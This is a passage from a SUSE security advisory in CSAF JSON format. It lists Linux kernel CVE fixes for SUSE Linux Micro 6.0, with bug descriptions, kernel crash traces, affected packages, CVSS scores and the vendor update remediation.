set_huge_pte_at+0x25c/0x280\n hugetlb_change_protection+0x220/0x430\n change_protection+0x5c/0x8c\n mprotect_fixup+0x10c/0x294\n do_mprotect_pkey.constprop.0+0x2e0/0x3d4\n __arm64_sys_mprotect+0x24/0x44\n invoke_syscall+0x50/0x160\n el0_svc_common+0x48/0x144\n do_el0_svc+0x30/0xe0\n el0_svc+0x30/0xf0\n el0t_64_sync_handler+0xc4/0x148\n el0t_64_sync+0x1a4/0x1a8\n\nSoft lockup is not triggered with THP or base page because there is\ncond_resched() called for each PMD size.\n\nAlthough the soft lockup was triggered by MTE, it should be not MTE\nspecific. The other processing which takes long time in the loop may\ntrigger soft lockup too.\n\nSo add cond_resched() for hugetlb to avoid soft lockup.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40153",
"url": "https://www.suse.com/security/cve/CVE-2025-40153"
},
{
"category": "external",
"summary": "SUSE Bug 1253408 for CVE-2025-40153",
"url": "https://bugzilla.suse.com/1253408"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2025-40153"
},
{
"cve": "CVE-2025-40158",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40158"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: use RCU in ip6_output()\n\nUse RCU in ip6_output() in order to use dst_dev_rcu() to prevent\npossible UAF.\n\nWe can remove rcu_read_lock()/rcu_read_unlock() pairs\nfrom ip6_finish_output2().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40158",
"url": "https://www.suse.com/security/cve/CVE-2025-40158"
},
{
"category": "external",
"summary": "SUSE Bug 1253402 for CVE-2025-40158",
"url": "https://bugzilla.suse.com/1253402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40158"
},
{
"cve": "CVE-2025-40160",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40160"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxen/events: Return -EEXIST for bound VIRQs\n\nChange find_virq() to return -EEXIST when a VIRQ is bound to a\ndifferent CPU than the one passed in. With that, remove the BUG_ON()\nfrom bind_virq_to_irq() to propogate the error upwards.\n\nSome VIRQs are per-cpu, but others are per-domain or global. Those must\nbe bound to CPU0 and can then migrate elsewhere. The lookup for\nper-domain and global will probably fail when migrated off CPU 0,\nespecially when the current CPU is tracked. This now returns -EEXIST\ninstead of BUG_ON().\n\nA second call to bind a per-domain or global VIRQ is not expected, but\nmake it non-fatal to avoid trying to look up the irq, since we don\u0027t\nknow which per_cpu(virq_to_irq) it will be in.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40160",
"url": "https://www.suse.com/security/cve/CVE-2025-40160"
},
{
"category": "external",
"summary": "SUSE Bug 1253400 for CVE-2025-40160",
"url": "https://bugzilla.suse.com/1253400"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2025-40160"
},
{
"cve": "CVE-2025-40167",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40167"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: detect invalid INLINE_DATA + EXTENTS flag combination\n\nsyzbot reported a BUG_ON in ext4_es_cache_extent() when opening a verity\nfile on a corrupted ext4 filesystem mounted without a journal.\n\nThe issue is that the filesystem has an inode with both the INLINE_DATA\nand EXTENTS flags set:\n\n EXT4-fs error (device loop0): ext4_cache_extents:545: inode #15:\n comm syz.0.17: corrupted extent tree: lblk 0 \u003c prev 66\n\nInvestigation revealed that the inode has both flags set:\n DEBUG: inode 15 - flag=1, i_inline_off=164, has_inline=1, extents_flag=1\n\nThis is an invalid combination since an inode should have either:\n- INLINE_DATA: data stored directly in the inode\n- EXTENTS: data stored in extent-mapped blocks\n\nHaving both flags causes ext4_has_inline_data() to return true, skipping\nextent tree validation in __ext4_iget(). The unvalidated out-of-order\nextents then trigger a BUG_ON in ext4_es_cache_extent() due to integer\nunderflow when calculating hole sizes.\n\nFix this by detecting this invalid flag combination early in ext4_iget()\nand rejecting the corrupted inode.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40167",
"url": "https://www.suse.com/security/cve/CVE-2025-40167"
},
{
"category": "external",
"summary": "SUSE Bug 1253458 for CVE-2025-40167",
"url": "https://bugzilla.suse.com/1253458"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40167"
},
{
"cve": "CVE-2025-40170",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40170"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: use dst_dev_rcu() in sk_setup_caps()\n\nUse RCU to protect accesses to dst-\u003edev from sk_setup_caps()\nand sk_dst_gso_max_size().\n\nAlso use dst_dev_rcu() in ip6_dst_mtu_maybe_forward(),\nand ip_dst_mtu_maybe_forward().\n\nip4_dst_hoplimit() can use dst_dev_net_rcu().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40170",
"url": "https://www.suse.com/security/cve/CVE-2025-40170"
},
{
"category": "external",
"summary": "SUSE Bug 1253413 for CVE-2025-40170",
"url": "https://bugzilla.suse.com/1253413"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40170"
},
{
"cve": "CVE-2025-40178",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40178"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npid: Add a judgment for ns null in pid_nr_ns\n\n__task_pid_nr_ns\n ns = task_active_pid_ns(current);\n pid_nr_ns(rcu_dereference(*task_pid_ptr(task, type)), ns);\n if (pid \u0026\u0026 ns-\u003elevel \u003c= pid-\u003elevel) {\n\nSometimes null is returned for task_active_pid_ns. Then it will trigger kernel panic in pid_nr_ns.\n\nFor example:\n\tUnable to handle kernel NULL pointer dereference at virtual address 0000000000000058\n\tMem abort info:\n\tESR = 0x0000000096000007\n\tEC = 0x25: DABT (current EL), IL = 32 bits\n\tSET = 0, FnV = 0\n\tEA = 0, S1PTW = 0\n\tFSC = 0x07: level 3 translation fault\n\tData abort info:\n\tISV = 0, ISS = 0x00000007, ISS2 = 0x00000000\n\tCM = 0, WnR = 0, TnD = 0, TagAccess = 0\n\tGCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n\tuser pgtable: 4k pages, 39-bit VAs, pgdp=00000002175aa000\n\t[0000000000000058] pgd=08000002175ab003, p4d=08000002175ab003, pud=08000002175ab003, pmd=08000002175be003, pte=0000000000000000\n\tpstate: 834000c5 (Nzcv daIF +PAN -UAO +TCO +DIT -SSBS BTYPE=--)\n\tpc : __task_pid_nr_ns+0x74/0xd0\n\tlr : __task_pid_nr_ns+0x24/0xd0\n\tsp : ffffffc08001bd10\n\tx29: ffffffc08001bd10 x28: ffffffd4422b2000 x27: 0000000000000001\n\tx26: ffffffd442821168 x25: ffffffd442821000 x24: 00000f89492eab31\n\tx23: 00000000000000c0 x22: ffffff806f5693c0 x21: ffffff806f5693c0\n\tx20: 0000000000000001 x19: 0000000000000000 x18: 0000000000000000\n\tx17: 00000000529c6ef0 x16: 00000000529c6ef0 x15: 00000000023a1adc\n\tx14: 0000000000000003 x13: 00000000007ef6d8 x12: 001167c391c78800\n\tx11: 00ffffffffffffff x10: 0000000000000000 x9 : 0000000000000001\n\tx8 : ffffff80816fa3c0 x7 : 0000000000000000 x6 : 49534d702d535449\n\tx5 : ffffffc080c4c2c0 x4 : ffffffd43ee128c8 x3 : ffffffd43ee124dc\n\tx2 : 0000000000000000 x1 : 0000000000000001 x0 : ffffff806f5693c0\n\tCall trace:\n\t__task_pid_nr_ns+0x74/0xd0\n\t...\n\t__handle_irq_event_percpu+0xd4/0x284\n\thandle_irq_event+0x48/0xb0\n\thandle_fasteoi_irq+0x160/0x2d8\n\tgeneric_handle_domain_irq+0x44/0x60\n\tgic_handle_irq+0x4c/0x114\n\tcall_on_irq_stack+0x3c/0x74\n\tdo_interrupt_handler+0x4c/0x84\n\tel1_interrupt+0x34/0x58\n\tel1h_64_irq_handler+0x18/0x24\n\tel1h_64_irq+0x68/0x6c\n\taccount_kernel_stack+0x60/0x144\n\texit_task_stack_account+0x1c/0x80\n\tdo_exit+0x7e4/0xaf8\n\t...\n\tget_signal+0x7bc/0x8d8\n\tdo_notify_resume+0x128/0x828\n\tel0_svc+0x6c/0x70\n\tel0t_64_sync_handler+0x68/0xbc\n\tel0t_64_sync+0x1a8/0x1ac\n\tCode: 35fffe54 911a02a8 f9400108 b4000128 (b9405a69)\n\t---[ end trace 0000000000000000 ]---\n\tKernel panic - not syncing: Oops: Fatal exception in interrupt",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40178",
"url": "https://www.suse.com/security/cve/CVE-2025-40178"
},
{
"category": "external",
"summary": "SUSE Bug 1253463 for CVE-2025-40178",
"url": "https://bugzilla.suse.com/1253463"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40178"
},
{
"cve": "CVE-2025-40179",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40179"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: verify orphan file size is not too big\n\nIn principle orphan file can be arbitrarily large. However orphan replay\nneeds to traverse it all and we also pin all its buffers in memory. Thus\nfilesystems with absurdly large orphan files can lead to big amounts of\nmemory consumed. Limit orphan file size to a sane value and also use\nkvmalloc() for allocating array of block descriptor structures to avoid\nlarge order allocations for sane but large orphan files.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40179",
"url": "https://www.suse.com/security/cve/CVE-2025-40179"
},
{
